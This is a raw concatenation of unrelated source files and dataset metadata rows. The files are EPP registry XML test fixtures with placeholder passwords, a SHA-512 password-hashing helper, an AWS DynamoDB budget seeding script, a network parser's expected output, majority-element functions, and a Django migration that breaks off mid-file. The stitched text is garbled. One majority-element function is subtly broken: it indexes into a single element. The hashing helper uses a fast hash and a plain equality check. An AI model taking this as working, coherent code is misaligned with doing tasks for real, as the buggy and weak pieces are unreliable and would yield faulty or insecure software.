<contact:roid>e654321-REP</contact:roid>
<contact:status s="ok" />
<contact:postalInfo type="int">
<contact:name>John Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>Av. Nações Unidas, 11541</contact:street>
<contact:street>7º andar</contact:street>
<contact:city>São Paulo</contact:city>
<contact:sp>SP</contact:sp>
<contact:pc>04578-000</contact:pc>
<contact:cc>BR</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:voice x="1234">+55.1155093500</contact:voice>
<contact:fax>+55.1155093501</contact:fax>
<contact:email>jdoe@example.com.br</contact:email>
<contact:clID>ClientY</contact:clID>
<contact:crID>ClientX</contact:crID>
<contact:crDate>2005-12-05T12:00:00.0Z</contact:crDate>
<contact:upID>ClientX</contact:upID>
<contact:upDate>2005-12-05T12:00:00.0Z</contact:upDate>
<contact:disclose flag="0">
<contact:voice />
<contact:email />
</contact:disclose>
</contact:infData>
</resData>
<extension>
<brorg:infData xmlns:brorg="urn:ietf:params:xml:ns:brorg-1.0">
<brorg:organization>005.506.560/0001-36</brorg:organization>
<brorg:contact type="admin">fan</brorg:contact>
<brorg:responsible>João Cláudio da Silva</brorg:responsible>
<brorg:proxy>EDS279</brorg:proxy>
<brorg:exDate>2006-06-06T06:00:00.0Z</brorg:exDate>
<brorg:domainName>nic.br</brorg:domainName>
<brorg:domainName>ptt.br</brorg:domainName>
<brorg:domainName>registro.br</brorg:domainName>
<brorg:asNumber>64500</brorg:asNumber>
<brorg:ipRange version="v4">
<brorg:startAddress>192.168.0.0</brorg:startAddress>
<brorg:endAddress>192.168.0.255</brorg:endAddress>
</brorg:ipRange>
<brorg:suspended>true</brorg:suspended>
</brorg:infData>
<lacnicorg:infData xmlns:lacnicorg="urn:ietf:params:xml:ns:lacnicorg-1.0">
<lacnicorg:type>nir</lacnicorg:type>
<lacnicorg:eppStatus>active</lacnicorg:eppStatus>
<lacnicorg:eppIP>192.168.0.1</lacnicorg:eppIP>
<lacnicorg:eppIP>192.0.2.0/24</lacnicorg:eppIP>
<lacnicorg:renewalType>member</lacnicorg:renewalType>
<lacnicorg:renewalType>small</lacnicorg:renewalType>
<lacnicorg:renewalType>founding-partner</lacnicorg:renewalType>
<lacnicorg:renewalDate>2015-06-01T12:00:00.0Z</lacnicorg:renewalDate>
<lacnicorg:resourcesClass>non-legacy-only</lacnicorg:resourcesClass>
<lacnicorg:password>abc123</lacnicorg:password>
<lacnicorg:legacy>true</lacnicorg:legacy>
</lacnicorg:infData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def transferquerycontactcommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<transfer op="query">
<contact:transfer xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>ab-12345</contact:id>
<contact:authInfo>
<contact:pw>123</contact:pw>
</contact:authInfo>
</contact:transfer>
</transfer>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responsetransferquerycontactcommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<contact:trnData xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>sh8013</contact:id>
<contact:trStatus>pending</contact:trStatus>
<contact:reID>ClientX</contact:reID>
<contact:reDate>2000-06-06T22:00:00.0Z</contact:reDate>
<contact:acID>ClientY</contact:acID>
<contact:acDate>2000-06-11T22:00:00.0Z</contact:acDate>
</contact:trnData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def transferrequestcontactcommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<transfer op="request">
<contact:transfer xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>ab-12345</contact:id>
<contact:authInfo>
<contact:pw>123</contact:pw>
</contact:authInfo>
</contact:transfer>
</transfer>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responsetransferrequestcontactcommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1001">
<msg>Command completed successfully; action pending</msg>
</result>
<resData>
<contact:trnData xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>sh8013</contact:id>
<contact:trStatus>pending</contact:trStatus>
<contact:reID>ClientX</contact:reID>
<contact:reDate>2000-06-08T22:00:00.0Z</contact:reDate>
<contact:acID>ClientY</contact:acID>
<contact:acDate>2000-06-13T22:00:00.0Z</contact:acDate>
</contact:trnData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def updatecontactcommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<update>
<contact:update xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>ab-12345</contact:id>
<contact:add>
<contact:status s="clientDeleteProhibited" />
</contact:add>
<contact:rem>
<contact:status s="clientDeleteProhibited" />
</contact:rem>
<contact:chg>
<contact:postalInfo type="loc">
<contact:name>Joe Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>123 Example Dr.</contact:street>
<contact:street>Suite 100</contact:street>
<contact:street>xyz</contact:street>
<contact:city>Dulles</contact:city>
<contact:sp>VA</contact:sp>
<contact:pc>20166-6503</contact:pc>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:postalInfo type="int">
<contact:name>Anna Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>123 Example Dr.</contact:street>
<contact:street>Suite 100</contact:street>
<contact:street>xyz</contact:street>
<contact:city>Dulles</contact:city>
<contact:sp>VA</contact:sp>
<contact:pc>20166-6503</contact:pc>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:voice x="1234">+1.7035555555</contact:voice>
<contact:email>jdoe@example.com</contact:email>
<contact:authInfo>
<contact:pw>123</contact:pw>
</contact:authInfo>
<contact:disclose flag="1">
<contact:name type="int" />
<contact:org type="int" />
<contact:addr type="int" />
<contact:voice />
<contact:fax />
<contact:email />
</contact:disclose>
</contact:chg>
</contact:update>
</update>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def updatecontactcommandwithlacnicxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<update>
<contact:update xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>ab-12345</contact:id>
<contact:add>
<contact:status s="clientDeleteProhibited" />
</contact:add>
<contact:rem>
<contact:status s="clientDeleteProhibited" />
</contact:rem>
<contact:chg>
<contact:postalInfo type="loc">
<contact:name>Joe Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>123 Example Dr.</contact:street>
<contact:street>Suite 100</contact:street>
<contact:street>xyz</contact:street>
<contact:city>Dulles</contact:city>
<contact:sp>VA</contact:sp>
<contact:pc>20166-6503</contact:pc>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:postalInfo type="int">
<contact:name>Anna Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>123 Example Dr.</contact:street>
<contact:street>Suite 100</contact:street>
<contact:street>xyz</contact:street>
<contact:city>Dulles</contact:city>
<contact:sp>VA</contact:sp>
<contact:pc>20166-6503</contact:pc>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:voice x="1234">+1.7035555555</contact:voice>
<contact:email>jdoe@example.com</contact:email>
<contact:authInfo>
<contact:pw>123</contact:pw>
</contact:authInfo>
<contact:disclose flag="1">
<contact:name type="int" />
<contact:org type="int" />
<contact:addr type="int" />
<contact:voice />
<contact:fax />
<contact:email />
</contact:disclose>
</contact:chg>
</contact:update>
</update>
<extension>
<lacniccontact:update xmlns:lacniccontact="urn:ietf:params:xml:ns:lacniccontact-1.0">
<lacniccontact:add>
<lacniccontact:property>bulkwhois</lacniccontact:property>
</lacniccontact:add>
<lacniccontact:rem>
<lacniccontact:property>inactive</lacniccontact:property>
</lacniccontact:rem>
<lacniccontact:chg>
<lacniccontact:password>abc123</lacniccontact:password>
<lacniccontact:reminder>Default</lacniccontact:reminder>
<lacniccontact:language>pt</lacniccontact:language>
</lacniccontact:chg>
</lacniccontact:update>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def updatecontactcommandwithbrorgandlacnicorgxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<update>
<contact:update xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>ab-12345</contact:id>
<contact:add>
<contact:status s="clientDeleteProhibited" />
</contact:add>
<contact:rem>
<contact:status s="clientDeleteProhibited" />
</contact:rem>
<contact:chg>
<contact:postalInfo type="loc">
<contact:name>Joe Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>123 Example Dr.</contact:street>
<contact:street>Suite 100</contact:street>
<contact:street>xyz</contact:street>
<contact:city>Dulles</contact:city>
<contact:sp>VA</contact:sp>
<contact:pc>20166-6503</contact:pc>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:postalInfo type="int">
<contact:name>Anna Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>123 Example Dr.</contact:street>
<contact:street>Suite 100</contact:street>
<contact:street>xyz</contact:street>
<contact:city>Dulles</contact:city>
<contact:sp>VA</contact:sp>
<contact:pc>20166-6503</contact:pc>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:voice x="1234">+1.7035555555</contact:voice>
<contact:email>jdoe@example.com</contact:email>
<contact:authInfo>
<contact:pw>123</contact:pw>
</contact:authInfo>
<contact:disclose flag="1">
<contact:name type="int" />
<contact:org type="int" />
<contact:addr type="int" />
<contact:voice />
<contact:fax />
<contact:email />
</contact:disclose>
</contact:chg>
</contact:update>
</update>
<extension>
<brorg:update xmlns:brorg="urn:ietf:params:xml:ns:brorg-1.0">
<brorg:organization>005.506.560/0001-36</brorg:organization>
<brorg:add>
<brorg:contact type="admin">hkk</brorg:contact>
</brorg:add>
<brorg:rem>
<brorg:contact type="admin">fan</brorg:contact>
</brorg:rem>
<brorg:chg>
<brorg:responsible>Responsible Name</brorg:responsible>
<brorg:exDate>2009-02-01T12:00:00.0Z</brorg:exDate>
<brorg:suspended>true</brorg:suspended>
</brorg:chg>
</brorg:update>
<lacnicorg:update xmlns:lacnicorg="urn:ietf:params:xml:ns:lacnicorg-1.0">
<lacnicorg:add>
<lacnicorg:eppIP>192.168.0.1</lacnicorg:eppIP>
<lacnicorg:eppIP>192.0.2.0/24</lacnicorg:eppIP>
<lacnicorg:renewalType>large</lacnicorg:renewalType>
</lacnicorg:add>
<lacnicorg:rem>
<lacnicorg:eppIP>203.0.113.0/24</lacnicorg:eppIP>
<lacnicorg:renewalType>small</lacnicorg:renewalType>
</lacnicorg:rem>
<lacnicorg:chg>
<lacnicorg:type>normal</lacnicorg:type>
<lacnicorg:eppStatus>active</lacnicorg:eppStatus>
<lacnicorg:eppPassword>abc123</lacnicorg:eppPassword>
<lacnicorg:resourcesClass>non-legacy-only</lacnicorg:resourcesClass>
</lacnicorg:chg>
<lacnicorg:password>abc123</lacnicorg:password>
</lacnicorg:update>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responseupdatecontactcommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
| 34.375 | 92 | 0.608892 | 3,908 | 35,200 | 5.482856 | 0.08086 | 0.054604 | 0.037616 | 0.046297 | 0.850422 | 0.836001 | 0.806833 | 0.798059 | 0.764643 | 0.753909 | 0 | 0.057285 | 0.22983 | 35,200 | 1,023 | 93 | 34.408602 | 0.733087 | 0.000597 | 0 | 0.837838 | 0 | 0.056133 | 0.923162 | 0.422025 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029106 | false | 0.006237 | 0.005198 | 0.025988 | 0.06341 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
93bce8b6d39023f1a837504807dd36be6af6fa8b | 1,176 | py | Python | apps/core/utils.py | romansalin/calendio | a9989f83b0e60bb07641aa2c92bccbc21fa97f70 | [
"MIT"
] | 1 | 2015-09-20T17:06:02.000Z | 2015-09-20T17:06:02.000Z | apps/core/utils.py | romansalin/calendio | a9989f83b0e60bb07641aa2c92bccbc21fa97f70 | [
"MIT"
] | null | null | null | apps/core/utils.py | romansalin/calendio | a9989f83b0e60bb07641aa2c92bccbc21fa97f70 | [
"MIT"
] | null | null | null | import hashlib
import uuid
from functools import wraps
def make_pass(password):
salt = uuid.uuid4().hex
hash_ = hashlib.sha512(password.encode('utf-8') +
salt.encode('utf-8')).hexdigest()
return salt, hash_
def check_pass(password, hash_, salt):
return hash_ == hashlib.sha512(password.encode('utf-8') +
salt.encode('utf-8')).hexdigest()
def is_loggedin(redirect_to='index'):
def decorator(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
if self.session.get('user', False):
self.redirect(self.reverse_url(redirect_to))
return
else:
return func(self, *args, **kwargs)
return wrapper
return decorator
def authenticated(redirect_to='login'):
def decorator(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
if not self.session.get('user', False):
self.redirect(self.reverse_url(redirect_to))
return
else:
return func(self, *args, **kwargs)
return wrapper
return decorator
| 28 | 68 | 0.565476 | 130 | 1,176 | 5.015385 | 0.330769 | 0.055215 | 0.06135 | 0.076687 | 0.705521 | 0.705521 | 0.705521 | 0.705521 | 0.705521 | 0.705521 | 0 | 0.013682 | 0.316327 | 1,176 | 41 | 69 | 28.682927 | 0.797264 | 0 | 0 | 0.606061 | 0 | 0 | 0.032313 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.242424 | false | 0.121212 | 0.090909 | 0.030303 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
19146de71e2c3a21f25e5dde88c3eb6e788ecb54 | 3,217 | py | Python | master_data.py | aws-samples/aws-cost-control-approval-workflow | 009ff041ea32de829e3ce963ff99b036a1835fda | [
"MIT-0"
] | 5 | 2020-09-28T12:11:32.000Z | 2022-03-25T08:35:27.000Z | master_data.py | surukonda/aws-cost-control-approval-workflow | 009ff041ea32de829e3ce963ff99b036a1835fda | [
"MIT-0"
] | null | null | null | master_data.py | surukonda/aws-cost-control-approval-workflow | 009ff041ea32de829e3ce963ff99b036a1835fda | [
"MIT-0"
] | 5 | 2020-12-21T12:22:14.000Z | 2021-11-20T20:03:26.000Z | import boto3
import json
import uuid
import datetime
dynamodb = boto3.resource('dynamodb', region_name='<AWS_REGION>') # TODO:: Update with aws-region where thes stack is deployed
table = dynamodb.Table('aws-samples-budgets') # TODO:: Once stack is deployed, update the DynamoDB Table Name
def insert_data(db_item):
table.put_item(Item=db_item)
budgets = [
{
"partitionKey": "BUDGET",
"rangeKey": str(uuid.uuid4()),
"budgetName": "bu1-monthly-budget",
"budgetLimit": 0,
"actualSpend": 0,
"forecastedSpend": 0,
"approverEmail": "admin1@email.com", # Email address of the admin for the business unit
"notifySNSTopic": "arn:aws:sns:ap-south-1:1234567891235:approval-notification", # Update the SNS notification for the business unit
"accruedForecastedSpend": 0,
"accruedBlockedSpend": 0,
"accruedApprovedSpend": 0,
"businessEntity": "business_entity_1",
"budgetForecastProcessed": False,
"budgetUpdatedAt": str(datetime.datetime.utcnow())
},
{
"partitionKey": "BUDGET",
"rangeKey": str(uuid.uuid4()),
"budgetName": "bu2-monthly-budget",
"budgetLimit": 0,
"actualSpend": 0,
"forecastedSpend": 0,
"approverEmail": "admin2@email.com", # Email address of the admin for the business unit
"notifySNSTopic": "arn:aws:sns:ap-south-1:1234567891235:approval-notification", # Update the SNS notification for the business unit
"accruedForecastedSpend": 0,
"accruedBlockedSpend": 0,
"accruedApprovedSpend": 0,
"businessEntity": "business_entity_2",
"budgetForecastProcessed": False,
"budgetUpdatedAt": str(datetime.datetime.utcnow())
},
{
"partitionKey": "BUDGET",
"rangeKey": str(uuid.uuid4()),
"budgetName": "bu3-monthly-budget",
"budgetLimit": 0,
"actualSpend": 0,
"forecastedSpend": 0,
"approverEmail": "admin3@email.com", # Email address of the admin for the business unit
"notifySNSTopic": "arn:aws:sns:ap-south-1:1234567891235:approval-notification", # Update the SNS notification for the business unit
"accruedForecastedSpend": 0,
"accruedBlockedSpend": 0,
"accruedApprovedSpend": 0,
"businessEntity": "business_entity_3",
"budgetForecastProcessed": False,
"budgetUpdatedAt": str(datetime.datetime.utcnow())
},
{
"partitionKey": "BUDGET",
"rangeKey": str(uuid.uuid4()),
"budgetName": "bu4-monthly-budget",
"budgetLimit": 0,
"actualSpend": 0,
"forecastedSpend": 0,
"approverEmail": "admin4@email.com", # Email address of the admin for the business unit
"notifySNSTopic": "arn:aws:sns:ap-south-1:1234567891235:approval-notification", # Update the SNS notification for the business unit
"accruedForecastedSpend": 0,
"accruedBlockedSpend": 0,
"accruedApprovedSpend": 0,
"businessEntity": "business_entity_4",
"budgetForecastProcessed": False,
"budgetUpdatedAt": str(datetime.datetime.utcnow())
}
]
for item in budgets:
insert_data(item)
| 39.716049 | 139 | 0.643146 | 317 | 3,217 | 6.479495 | 0.249211 | 0.023369 | 0.054528 | 0.070107 | 0.833496 | 0.833496 | 0.833496 | 0.77702 | 0.77702 | 0.648491 | 0 | 0.0395 | 0.228785 | 3,217 | 80 | 140 | 40.2125 | 0.788392 | 0.160398 | 0 | 0.578947 | 0 | 0 | 0.493309 | 0.15316 | 0 | 0 | 0 | 0.0125 | 0 | 1 | 0.013158 | false | 0 | 0.052632 | 0 | 0.065789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5ffcb4bc6a45249c0d9e03940b388155335c8a46 | 5,082 | py | Python | src/genie/libs/parser/nxos/tests/ShowIpRipInterfaceVrfAll/cli/equal/golden_output_1_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/nxos/tests/ShowIpRipInterfaceVrfAll/cli/equal/golden_output_1_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/nxos/tests/ShowIpRipInterfaceVrfAll/cli/equal/golden_output_1_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z |
expected_output = {
'vrf': {
'VRF1': {
'address_family': {
'ipv4': {
'instance': {
'rip-1': {
'interfaces': {
'Ethernet1/1.200': {
'ipv4': {
'10.1.2.1/24': {
'ip': '10.1.2.1',
'prefix_length': 24,
},
},
'metric': 1,
'oper_status': 'up',
'split_horizon': True,
'states': {
'admin_state': 'up',
'link_state': 'up',
'protocol_state': 'up',
},
},
'Ethernet1/2.200': {
'authentication': {
'auth_key': {
'crypto_algorithm': 'md5',
},
'auth_key_chain': {
'key_chain': 'none',
},
},
'ipv4': {
'10.1.3.1/24': {
'ip': '10.1.3.1',
'prefix_length': 24,
},
},
'metric': 1,
'oper_status': 'up',
'split_horizon': True,
'states': {
'admin_state': 'up',
'link_state': 'up',
'protocol_state': 'up',
},
},
},
},
},
},
},
},
'default': {
'address_family': {
'ipv4': {
'instance': {
'rip-1': {
'interfaces': {
'Ethernet1/1.100': {
'ipv4': {
'10.1.2.1/24': {
'ip': '10.1.2.1',
'prefix_length': 24,
},
},
'metric': 1,
'oper_status': 'up',
'passive': True,
'split_horizon': True,
'states': {
'admin_state': 'up',
'link_state': 'up',
'protocol_state': 'up',
},
},
'Ethernet1/2.100': {
'authentication': {
'auth_key': {
'crypto_algorithm': 'none',
},
'auth_key_chain': {
'key_chain': '1',
},
},
'ipv4': {
'10.1.3.1/24': {
'ip': '10.1.3.1',
'prefix_length': 24,
},
},
'metric': 1,
'oper_status': 'up',
'split_horizon': True,
'states': {
'admin_state': 'up',
'link_state': 'up',
'protocol_state': 'up',
},
},
},
},
},
},
},
},
},
}
| 45.375 | 71 | 0.152302 | 185 | 5,082 | 3.983784 | 0.232432 | 0.113976 | 0.037992 | 0.027137 | 0.914518 | 0.762551 | 0.762551 | 0.762551 | 0.762551 | 0.629579 | 0 | 0.074529 | 0.75974 | 5,082 | 111 | 72 | 45.783784 | 0.529075 | 0 | 0 | 0.550459 | 0 | 0 | 0.150591 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.009174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
276d55882294ea6fa846f25f73637830ad909539 | 2,106 | py | Python | Ace-Your-Python-Coding-Interview/Section 4 Part 1 - Easy Interview Question.py | IvanDemin3467/Ace-Your-Python-Coding-Interview | 4139af42c85785f10667c4b7e987ab1e4fb8e802 | [
"Unlicense"
] | null | null | null | Ace-Your-Python-Coding-Interview/Section 4 Part 1 - Easy Interview Question.py | IvanDemin3467/Ace-Your-Python-Coding-Interview | 4139af42c85785f10667c4b7e987ab1e4fb8e802 | [
"Unlicense"
] | null | null | null | Ace-Your-Python-Coding-Interview/Section 4 Part 1 - Easy Interview Question.py | IvanDemin3467/Ace-Your-Python-Coding-Interview | 4139af42c85785f10667c4b7e987ab1e4fb8e802 | [
"Unlicense"
] | null | null | null | def majority_element_indexes(lst):
'''
Return a list of the indexes of the majority element.
Majority element is the element that appears more than
floor(n / 2) times.
If there is no majority element, return []
>>> majority_element_indexes([1, 1, 2])
[0, 1]
>>> majority_element_indexes([1, 1, 2, 3, 4])
[]
>>> majority_element_indexes([1, 2])
[]
>>> majority_element_indexes([1])
[0]
'''
# find majority element
# if there is no majority element, return []
# find the indexes of the majority element,
# put them in a lst
from collections import Counter
if lst == []:
return []
count = Counter(lst)
top_elems = sorted(
count.keys(),
key=lambda x: -count[x]
)
maj_elem = top_elems[0]
# Top elem doesn't have majority count
if count[maj_elem[0]] <= len(lst) // 2:
return []
return [
i for i, elem in enumerate(lst)
if elem == maj_elem
]
def majority_element_indexes(lst):
'''
Return a list of the indexes of the majority element.
Majority element is the element that appears more than
floor(n / 2) times.
If there is no majority element, return []
>>> majority_element_indexes([1, 1, 2])
[0, 1]
>>> majority_element_indexes([1, 1, 2, 3, 4])
[]
>>> majority_element_indexes([1, 2])
[]
>>> majority_element_indexes([1])
[0]
'''
# find majority element
# if there is no majority element, return []
# find the indexes of the majority element,
# put them in a lst
from collections import Counter
if lst == []:
return []
count = Counter(lst)
max_count = max(count.values())
maj_elems = [
elem for elem, count
in count.items() if count == max_count
]
# Top two elems have same count
# or top elem doesn't have majority count
if (
len(maj_elems) > 1
or count[maj_elems[0]] <= len(lst) // 2
):
return []
return [
i for i, elem in enumerate(lst)
if elem == maj_elems[0]
]
| 27.350649 | 58 | 0.584995 | 288 | 2,106 | 4.170139 | 0.197917 | 0.274771 | 0.183181 | 0.153206 | 0.830974 | 0.830974 | 0.830974 | 0.830974 | 0.777685 | 0.777685 | 0 | 0.025136 | 0.301045 | 2,106 | 76 | 59 | 27.710526 | 0.790761 | 0.498101 | 0 | 0.457143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057143 | false | 0 | 0.057143 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
277ab107ee937e0baa3858582908c6374439a8e2 | 213 | py | Python | tests/workflow_actions.py | Django-Stack-Backend/Django-backend-React-frontend | 4c814ab9b97d70a259d4b93e30d118deba9831fd | [
"BSD-3-Clause"
] | 1 | 2021-11-22T20:39:26.000Z | 2021-11-22T20:39:26.000Z | tests/workflow_actions.py | Django-Stack-Backend/Django-backend-React-frontend | 4c814ab9b97d70a259d4b93e30d118deba9831fd | [
"BSD-3-Clause"
] | null | null | null | tests/workflow_actions.py | Django-Stack-Backend/Django-backend-React-frontend | 4c814ab9b97d70a259d4b93e30d118deba9831fd | [
"BSD-3-Clause"
] | null | null | null | def todo_on_save(sender, instance, **kwargs):
return True
def todo_on_delete(sender, instance, **kwargs):
return True
actions = {"tests://ToDo": {"on_save": todo_on_save, "on_delete": todo_on_delete}}
| 21.3 | 82 | 0.704225 | 31 | 213 | 4.516129 | 0.387097 | 0.214286 | 0.214286 | 0.371429 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14554 | 213 | 9 | 83 | 23.666667 | 0.769231 | 0 | 0 | 0.4 | 0 | 0 | 0.131455 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.4 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
27ebe186df057784f36ccec647f57718d8c34143 | 17,125 | py | Python | pokemon_v2/migrations/0003_auto_20160530_1132.py | andersaucy/pokeapi | 8491024e223a8de582f016d2f8bba2f6a119978c | [
"BSD-3-Clause"
] | 2 | 2018-08-17T16:30:04.000Z | 2021-03-13T21:40:08.000Z | pokemon_v2/migrations/0003_auto_20160530_1132.py | andersaucy/pokeapi | 8491024e223a8de582f016d2f8bba2f6a119978c | [
"BSD-3-Clause"
] | null | null | null | pokemon_v2/migrations/0003_auto_20160530_1132.py | andersaucy/pokeapi | 8491024e223a8de582f016d2f8bba2f6a119978c | [
"BSD-3-Clause"
] | 1 | 2020-06-28T01:00:31.000Z | 2020-06-28T01:00:31.000Z | from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('pokemon_v2', '0002_itemsprites_pokemonformsprites_pokemonsprites'),
]
operations = [
migrations.AlterField(
model_name='ability',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='abilityname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='berry',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='berryfirmness',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='berryfirmnessname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='berryflavor',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='berryflavorname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='contesttype',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='contesttypename',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='egggroup',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='egggroupname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='encountercondition',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='encounterconditionname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='encounterconditionvalue',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='encounterconditionvaluename',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='encountermethod',
name='name',
field=models.CharField(max_length=100, db_index=True),
